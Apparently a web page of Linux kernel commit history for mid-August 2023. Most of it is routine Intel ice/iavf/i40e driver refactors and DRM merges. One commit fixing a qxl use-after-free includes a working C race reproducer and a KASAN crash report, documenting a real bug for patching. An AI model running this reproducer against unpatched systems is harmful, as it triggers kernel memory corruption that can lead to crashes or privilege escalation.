1. 19 Aug, 2023 5 commits
  2. 18 Aug, 2023 21 commits
  3. 17 Aug, 2023 14 commits
    • Jakub Kicinski's avatar
      Merge branch '40GbE' of git://git.kernel.org/pub/scm/linux/kernel/git/tnguy/net-queue · 820a38d8
      Jakub Kicinski authored
      Tony Nguyen says:
      
      ====================
      Intel Wired LAN Driver Updates 2023-08-16 (iavf, i40e)
      
      This series contains updates to iavf and i40e drivers.
      
      Piotr adds checks for unsupported Flow Director rules on iavf.
      
      Andrii replaces incorrect 'write' messaging on read operations for i40e.
      
      * '40GbE' of git://git.kernel.org/pub/scm/linux/kernel/git/tnguy/net-queue:
        i40e: fix misleading debug logs
        iavf: fix FDIR rule fields masks validation
      ====================
      
      Link: https://lore.kernel.org/r/20230816193308.1307535-1-anthony.l.nguyen@intel.comSigned-off-by: default avatarJakub Kicinski <kuba@kernel.org>
      820a38d8
    • Przemek Kitszel's avatar
      ice: split ice_aq_wait_for_event() func into two · fb9840c4
      Przemek Kitszel authored
      Mitigate race between registering on wait list and receiving
      AQ Response from FW.
      
      ice_aq_prep_for_event() should be called before sending AQ command,
      ice_aq_wait_for_event() should be called after sending AQ command,
      to wait for AQ Response.
      
      Please note, that this was found by reading the code,
      an actual race has not yet materialized.
      Reviewed-by: default avatarJacob Keller <jacob.e.keller@intel.com>
      Signed-off-by: default avatarPrzemek Kitszel <przemyslaw.kitszel@intel.com>
      Reviewed-by: default avatarSimon Horman <horms@kernel.org>
      Tested-by: Pucha Himasekhar Reddy <himasekharx.reddy.pucha@intel.com> (A Contingent worker at Intel)
      Reviewed-by: default avatarLeon Romanovsky <leonro@nvidia.com>
      Signed-off-by: default avatarTony Nguyen <anthony.l.nguyen@intel.com>
      fb9840c4
    • Przemek Kitszel's avatar
      ice: embed &ice_rq_event_info event into struct ice_aq_task · b214b98a
      Przemek Kitszel authored
      Expose struct ice_aq_task to callers,
      what takes burden of memory ownership out from AQ-wait family of functions,
      and reduces need for heap-based allocations.
      
      Embed struct ice_rq_event_info event into struct ice_aq_task
      (instead of it being a ptr) to remove some more code from the callers.
      
      Subsequent commit will improve more based on this one.
      Reviewed-by: default avatarJacob Keller <jacob.e.keller@intel.com>
      Signed-off-by: default avatarPrzemek Kitszel <przemyslaw.kitszel@intel.com>
      Reviewed-by: default avatarSimon Horman <horms@kernel.org>
      Tested-by: Pucha Himasekhar Reddy <himasekharx.reddy.pucha@intel.com> (A Contingent worker at Intel)
      Reviewed-by: default avatarLeon Romanovsky <leonro@nvidia.com>
      Signed-off-by: default avatarTony Nguyen <anthony.l.nguyen@intel.com>
      b214b98a
    • Przemek Kitszel's avatar
      ice: ice_aq_check_events: fix off-by-one check when filling buffer · e1e8a142
      Przemek Kitszel authored
      Allow task's event buffer to be filled also in the case that it's size
      is exactly the size of the message.
      
      Fixes: d69ea414 ("ice: implement device flash update via devlink")
      Reviewed-by: default avatarJacob Keller <jacob.e.keller@intel.com>
      Signed-off-by: default avatarPrzemek Kitszel <przemyslaw.kitszel@intel.com>
      Reviewed-by: default avatarSimon Horman <horms@kernel.org>
      Tested-by: Pucha Himasekhar Reddy <himasekharx.reddy.pucha@intel.com> (A Contingent worker at Intel)
      Signed-off-by: default avatarTony Nguyen <anthony.l.nguyen@intel.com>
      e1e8a142
    • Przemek Kitszel's avatar
      ice: drop two params from ice_aq_alloc_free_res() · 52da2fb2
      Przemek Kitszel authored
      Drop @num_entries and @cd params, latter of which was always NULL.
      
      Number of entities to alloc is passed in internal buffer, the outer layer
      (that @num_entries was assigned to) meaning is closer to "the number of
      requests", which was =1 in all cases.
      ice_free_hw_res() was always called with 1 as its @num arg.
      Signed-off-by: default avatarPrzemek Kitszel <przemyslaw.kitszel@intel.com>
      Tested-by: Pucha Himasekhar Reddy <himasekharx.reddy.pucha@intel.com> (A Contingent worker at Intel)
      Reviewed-by: default avatarLeon Romanovsky <leonro@nvidia.com>
      Signed-off-by: default avatarTony Nguyen <anthony.l.nguyen@intel.com>
      52da2fb2
    • Yang Yingliang's avatar
      ice: use list_for_each_entry() helper · 1533b774
      Yang Yingliang authored
      Convert list_for_each() to list_for_each_entry() where applicable.
      No functional changed.
      Signed-off-by: default avatarYang Yingliang <yangyingliang@huawei.com>
      Reviewed-by: default avatarSimon Horman <horms@kernel.org>
      Tested-by: default avatarSujai Buvaneswaran <sujai.buvaneswaran@intel.com>
      Reviewed-by: default avatarLeon Romanovsky <leonro@nvidia.com>
      Signed-off-by: default avatarTony Nguyen <anthony.l.nguyen@intel.com>
      1533b774
    • Marcin Szycik's avatar
      ice: Remove redundant VSI configuration in eswitch setup · 467a17ee
      Marcin Szycik authored
      Remove a call to disable VLAN stripping on switchdev control plane VSI, as
      it is disabled by default.
      Signed-off-by: default avatarMarcin Szycik <marcin.szycik@linux.intel.com>
      Tested-by: default avatarSujai Buvaneswaran <sujai.buvaneswaran@intel.com>
      Reviewed-by: default avatarLeon Romanovsky <leonro@nvidia.com>
      Signed-off-by: default avatarTony Nguyen <anthony.l.nguyen@intel.com>
      467a17ee
    • Jacob Keller's avatar
      ice: move E810T functions to before device agnostic ones · 403e4853
      Jacob Keller authored
      Commit 885fe693 ("ice: Add support for SMA control multiplexer")
      accidentally placed all of the E810T SMA control functions in the middle of
      the device agnostic functions section of ice_ptp_hw.c
      
      This works fine, but makes it harder for readers to follow. The
      ice_ptp_hw.c file is laid out such that each hardware family has the
      specific functions in one block, with the access functions placed at the
      end of the file.
      
      Move the E810T functions so that they are in a block just after the E810
      functions. Also move the ice_get_phy_tx_tstamp_ready_e810 which got added
      at the end of the E810T block.
      
      This keeps the functions laid out in a logical order and avoids intermixing
      the generic access functions with the device specific implementations.
      Signed-off-by: default avatarJacob Keller <jacob.e.keller@intel.com>
      Reviewed-by: default avatarPrzemek Kitszel <przemyslaw.kitszel@intel.com>
      Tested-by: Arpana Arland <arpanax.arland@intel.com> (A Contingent worker at Intel)
      Reviewed-by: default avatarLeon Romanovsky <leonro@nvidia.com>
      Signed-off-by: default avatarTony Nguyen <anthony.l.nguyen@intel.com>
      403e4853
    • Jan Sokolowski's avatar
      ice: refactor ice_vsi_is_vlan_pruning_ena · e528e5b2
      Jan Sokolowski authored
      As this method became static, and is already called
      with check for vsi being non-null, an unnecessary check along
      with superfluous parentheses is removed.
      Signed-off-by: default avatarJan Sokolowski <jan.sokolowski@intel.com>
      Reviewed-by: default avatarJacob Keller <jacob.e.keller@intel.com>
      Reviewed-by: default avatarPrzemek Kitszel <przemyslaw.kitszel@intel.com>
      Reviewed-by: default avatarLeon Romanovsky <leonro@nvidia.com>
      Signed-off-by: default avatarTony Nguyen <anthony.l.nguyen@intel.com>
      e528e5b2
    • Jan Sokolowski's avatar
      ice: refactor ice_ptp_hw to make functions static · cae48047
      Jan Sokolowski authored
      As following methods are not used outside ice_ptp_hw,
      they can be made static:
      ice_read_phy_reg_e822
      ice_write_phy_reg_e822
      ice_ptp_prep_port_adj_e822
      Signed-off-by: default avatarJan Sokolowski <jan.sokolowski@intel.com>
      Reviewed-by: default avatarJacob Keller <jacob.e.keller@intel.com>
      Reviewed-by: default avatarPrzemek Kitszel <przemyslaw.kitszel@intel.com>
      Reviewed-by: default avatarLeon Romanovsky <leonro@nvidia.com>
      Signed-off-by: default avatarTony Nguyen <anthony.l.nguyen@intel.com>
      cae48047
    • Jan Sokolowski's avatar
      ice: refactor ice_sched to make functions static · 9762f8fa
      Jan Sokolowski authored
      As ice_sched_set_node_bw_lmt_per_tc is not used
      outside of ice_sched, it can be made static.
      Signed-off-by: default avatarJan Sokolowski <jan.sokolowski@intel.com>
      Reviewed-by: default avatarJacob Keller <jacob.e.keller@intel.com>
      Reviewed-by: default avatarPrzemek Kitszel <przemyslaw.kitszel@intel.com>
      Reviewed-by: default avatarLeon Romanovsky <leonro@nvidia.com>
      Signed-off-by: default avatarTony Nguyen <anthony.l.nguyen@intel.com>
      9762f8fa
    • Tony Nguyen's avatar
      ice: Utilize assign_bit() helper · 54e852da
      Tony Nguyen authored
      The if/else check for bit setting can be replaced by using the
      assign_bit() helper so do so.
      Suggested-by: default avatarLeon Romanovsky <leonro@nvidia.com>
      Signed-off-by: default avatarTony Nguyen <anthony.l.nguyen@intel.com>
      54e852da
    • Wander Lairson Costa's avatar
      drm/qxl: fix UAF on handle creation · c611589b
      Wander Lairson Costa authored
      qxl_mode_dumb_create() dereferences the qobj returned by
      qxl_gem_object_create_with_handle(), but the handle is the only one
      holding a reference to it.
      
      A potential attacker could guess the returned handle value and closes it
      between the return of qxl_gem_object_create_with_handle() and the qobj
      usage, triggering a use-after-free scenario.
      
      Reproducer:
      
      int dri_fd =-1;
      struct drm_mode_create_dumb arg = {0};
      
      void gem_close(int handle);
      
      void* trigger(void* ptr)
      {
      	int ret;
      	arg.width = arg.height = 0x20;
      	arg.bpp = 32;
      	ret = ioctl(dri_fd, DRM_IOCTL_MODE_CREATE_DUMB, &arg);
      	if(ret)
      	{
      		perror("[*] DRM_IOCTL_MODE_CREATE_DUMB Failed");
      		exit(-1);
      	}
      	gem_close(arg.handle);
      	while(1) {
      		struct drm_mode_create_dumb args = {0};
      		args.width = args.height = 0x20;
      		args.bpp = 32;
      		ret = ioctl(dri_fd, DRM_IOCTL_MODE_CREATE_DUMB, &args);
      		if (ret) {
      			perror("[*] DRM_IOCTL_MODE_CREATE_DUMB Failed");
      			exit(-1);
      		}
      
      		printf("[*] DRM_IOCTL_MODE_CREATE_DUMB created, %d\n", args.handle);
      		gem_close(args.handle);
      	}
      	return NULL;
      }
      
      void gem_close(int handle)
      {
      	struct drm_gem_close args;
      	args.handle = handle;
      	int ret = ioctl(dri_fd, DRM_IOCTL_GEM_CLOSE, &args); // gem close handle
      	if (!ret)
      		printf("gem close handle %d\n", args.handle);
      }
      
      int main(void)
      {
      	dri_fd= open("/dev/dri/card0", O_RDWR);
      	printf("fd:%d\n", dri_fd);
      
      	if(dri_fd == -1)
      		return -1;
      
      	pthread_t tid1;
      
      	if(pthread_create(&tid1,NULL,trigger,NULL)){
      		perror("[*] thread_create tid1\n");
      		return -1;
      	}
      	while (1)
      	{
      		gem_close(arg.handle);
      	}
      	return 0;
      }
      
      This is a KASAN report:
      
      ==================================================================
      BUG: KASAN: slab-use-after-free in qxl_mode_dumb_create+0x3c2/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:69
      Write of size 1 at addr ffff88801136c240 by task poc/515
      
      CPU: 1 PID: 515 Comm: poc Not tainted 6.3.0 #3
      Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014
      Call Trace:
      <TASK>
      __dump_stack linux/lib/dump_stack.c:88
      dump_stack_lvl+0x48/0x70 linux/lib/dump_stack.c:106
      print_address_description linux/mm/kasan/report.c:319
      print_report+0xd2/0x660 linux/mm/kasan/report.c:430
      kasan_report+0xd2/0x110 linux/mm/kasan/report.c:536
      __asan_report_store1_noabort+0x17/0x30 linux/mm/kasan/report_generic.c:383
      qxl_mode_dumb_create+0x3c2/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:69
      drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
      drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
      drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
      drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
      vfs_ioctl linux/fs/ioctl.c:51
      __do_sys_ioctl linux/fs/ioctl.c:870
      __se_sys_ioctl linux/fs/ioctl.c:856
      __x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
      do_syscall_x64 linux/arch/x86/entry/common.c:50
      do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
      RIP: 0033:0x7ff5004ff5f7
      Code: 00 00 00 48 8b 05 99 c8 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 69 c8 0d 00 f7 d8 64 89 01 48
      
      RSP: 002b:00007ff500408ea8 EFLAGS: 00000286 ORIG_RAX: 0000000000000010
      RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff5004ff5f7
      RDX: 00007ff500408ec0 RSI: 00000000c02064b2 RDI: 0000000000000003
      RBP: 00007ff500408ef0 R08: 0000000000000000 R09: 000000000000002a
      R10: 0000000000000000 R11: 0000000000000286 R12: 00007fff1c6cdafe
      R13: 00007fff1c6cdaff R14: 00007ff500408fc0 R15: 0000000000802000
      </TASK>
      
      Allocated by task 515:
      kasan_save_stack+0x38/0x70 linux/mm/kasan/common.c:45
      kasan_set_track+0x25/0x40 linux/mm/kasan/common.c:52
      kasan_save_alloc_info+0x1e/0x40 linux/mm/kasan/generic.c:510
      ____kasan_kmalloc linux/mm/kasan/common.c:374
      __kasan_kmalloc+0xc3/0xd0 linux/mm/kasan/common.c:383
      kasan_kmalloc linux/./include/linux/kasan.h:196
      kmalloc_trace+0x48/0xc0 linux/mm/slab_common.c:1066
      kmalloc linux/./include/linux/slab.h:580
      kzalloc linux/./include/linux/slab.h:720
      qxl_bo_create+0x11a/0x610 linux/drivers/gpu/drm/qxl/qxl_object.c:124
      qxl_gem_object_create+0xd9/0x360 linux/drivers/gpu/drm/qxl/qxl_gem.c:58
      qxl_gem_object_create_with_handle+0xa1/0x180 linux/drivers/gpu/drm/qxl/qxl_gem.c:89
      qxl_mode_dumb_create+0x1cd/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:63
      drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
      drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
      drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
      drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
      vfs_ioctl linux/fs/ioctl.c:51
      __do_sys_ioctl linux/fs/ioctl.c:870
      __se_sys_ioctl linux/fs/ioctl.c:856
      __x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
      do_syscall_x64 linux/arch/x86/entry/common.c:50
      do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
      
      Freed by task 515:
      kasan_save_stack+0x38/0x70 linux/mm/kasan/common.c:45
      kasan_set_track+0x25/0x40 linux/mm/kasan/common.c:52
      kasan_save_free_info+0x2e/0x60 linux/mm/kasan/generic.c:521
      ____kasan_slab_free linux/mm/kasan/common.c:236
      ____kasan_slab_free+0x180/0x1f0 linux/mm/kasan/common.c:200
      __kasan_slab_free+0x12/0x30 linux/mm/kasan/common.c:244
      kasan_slab_free linux/./include/linux/kasan.h:162
      slab_free_hook linux/mm/slub.c:1781
      slab_free_freelist_hook+0xd2/0x1a0 linux/mm/slub.c:1807
      slab_free linux/mm/slub.c:3787
      __kmem_cache_free+0x196/0x2d0 linux/mm/slub.c:3800
      kfree+0x78/0x120 linux/mm/slab_common.c:1019
      qxl_ttm_bo_destroy+0x140/0x1a0 linux/drivers/gpu/drm/qxl/qxl_object.c:49
      ttm_bo_release+0x678/0xa30 linux/drivers/gpu/drm/ttm/ttm_bo.c:381
      kref_put linux/./include/linux/kref.h:65
      ttm_bo_put+0x50/0x80 linux/drivers/gpu/drm/ttm/ttm_bo.c:393
      qxl_gem_object_free+0x3e/0x60 linux/drivers/gpu/drm/qxl/qxl_gem.c:42
      drm_gem_object_free+0x5c/0x90 linux/drivers/gpu/drm/drm_gem.c:974
      kref_put linux/./include/linux/kref.h:65
      __drm_gem_object_put linux/./include/drm/drm_gem.h:431
      drm_gem_object_put linux/./include/drm/drm_gem.h:444
      qxl_gem_object_create_with_handle+0x151/0x180 linux/drivers/gpu/drm/qxl/qxl_gem.c:100
      qxl_mode_dumb_create+0x1cd/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:63
      drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
      drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
      drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
      drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
      vfs_ioctl linux/fs/ioctl.c:51
      __do_sys_ioctl linux/fs/ioctl.c:870
      __se_sys_ioctl linux/fs/ioctl.c:856
      __x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
      do_syscall_x64 linux/arch/x86/entry/common.c:50
      do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
      
      The buggy address belongs to the object at ffff88801136c000
      which belongs to the cache kmalloc-1k of size 1024
      The buggy address is located 576 bytes inside of
      freed 1024-byte region [ffff88801136c000, ffff88801136c400)
      
      The buggy address belongs to the physical page:
      page:0000000089fc329b refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x11368
      head:0000000089fc329b order:3 entire_mapcount:0 nr_pages_mapped:0 pincount:0
      flags: 0xfffffc0010200(slab|head|node=0|zone=1|lastcpupid=0x1fffff)
      raw: 000fffffc0010200 ffff888007841dc0 dead000000000122 0000000000000000
      raw: 0000000000000000 0000000080100010 00000001ffffffff 0000000000000000
      page dumped because: kasan: bad access detected
      
      Memory state around the buggy address:
      ffff88801136c100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ffff88801136c180: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      >ffff88801136c200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ^
      ffff88801136c280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ffff88801136c300: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ==================================================================
      Disabling lock debugging due to kernel taint
      
      Instead of returning a weak reference to the qxl_bo object, return the
      created drm_gem_object and let the caller decrement the reference count
      when it no longer needs it. As a convenience, if the caller is not
      interested in the gobj object, it can pass NULL to the parameter and the
      reference counting is descremented internally.
      
      The bug and the reproducer were originally found by the Zero Day Initiative project (ZDI-CAN-20940).
      
      Link: https://www.zerodayinitiative.com/Signed-off-by: default avatarWander Lairson Costa <wander@redhat.com>
      Cc: stable@vger.kernel.org
      Reviewed-by: default avatarDave Airlie <airlied@redhat.com>
      Signed-off-by: default avatarDave Airlie <airlied@redhat.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/20230814165119.90847-1-wander@redhat.com
      c611589b
    • Dave Airlie's avatar
      Merge tag 'amd-drm-fixes-6.5-2023-08-16' of... · 68c60b34
      Dave Airlie authored
      Merge tag 'amd-drm-fixes-6.5-2023-08-16' of https://gitlab.freedesktop.org/agd5f/linux into drm-fixes
      
      amd-drm-fixes-6.5-2023-08-16:
      
      amdgpu:
      - SMU 13.x fixes
      - Fix mcbp parameter for gfx9
      - SMU 11.x fixes
      - Temporary fix for large numbers of XCP partitions
      - S0ix fixes
      - DCN 2.0 fix
      Signed-off-by: default avatarDave Airlie <airlied@redhat.com>
      
      From: Alex Deucher <alexander.deucher@amd.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/20230816200226.10771-1-alexander.deucher@amd.com
      68c60b34